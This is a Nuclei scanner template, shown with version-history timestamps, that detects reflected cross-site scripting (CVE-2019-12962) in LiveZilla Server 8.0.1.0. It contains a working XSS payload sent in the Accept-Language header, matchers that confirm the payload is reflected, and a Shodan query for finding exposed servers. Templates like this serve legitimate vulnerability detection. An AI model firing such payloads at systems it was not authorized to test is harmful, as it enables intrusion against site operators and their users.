nuclei-templates/http/cves/2019/CVE-2019-12962.yaml

53 lines
1.4 KiB
YAML
Raw Normal View History

2022-05-08 14:45:08 +00:00
id: CVE-2019-12962
info:
name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
2022-05-08 14:45:08 +00:00
author: Clment Cruchet
severity: medium
2022-05-09 07:11:38 +00:00
description: |
LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
2022-05-09 07:11:38 +00:00
reference:
- https://www.exploit-db.com/exploits/49669
- https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
- http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-12962
cwe-id: CWE-79
epss-score: 0.20689
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.95731
2022-05-09 09:43:18 +00:00
metadata:
max-request: 1
2022-05-09 09:43:18 +00:00
shodan-query: http.html:LiveZilla
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: livezilla
product: livezilla
tags: xss,edb,packetstorm,cve,cve2019,livezilla
2022-05-09 09:43:18 +00:00
http:
2022-05-08 14:45:08 +00:00
- method: GET
path:
- '{{BaseURL}}/mobile/index.php'
2022-05-09 07:11:38 +00:00
headers:
Accept-Language: ';alert(document.domain)//'
2022-05-09 09:43:18 +00:00
2022-05-08 14:45:08 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-05-09 07:11:38 +00:00
words:
- "var detectedLanguage = ';alert(document.domain)//';"
2022-05-08 14:45:08 +00:00
- type: word
2022-05-09 07:11:38 +00:00
part: header
2022-05-08 14:45:08 +00:00
words:
- "text/html"
- type: status
status:
2022-05-08 14:52:43 +00:00
- 200